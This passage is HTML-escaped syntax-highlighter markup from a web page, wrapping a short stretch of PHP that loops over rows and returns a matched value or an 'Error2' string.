inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-55&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;				&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$chk&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-56&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;				&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;break&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-57&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;			&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-58&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-59&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$chk&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;==&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;return&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;Error2&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-60&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$chk&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-61&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;for&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$j&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$j&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$countRow&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$j&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-62&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;			&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;strtolower&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$j&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;+&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;===&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;strtolower&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$whereValue&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-63&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;				&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$chk&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-64&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;				&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;return&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$j&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;+&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-65&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;			&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-66&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		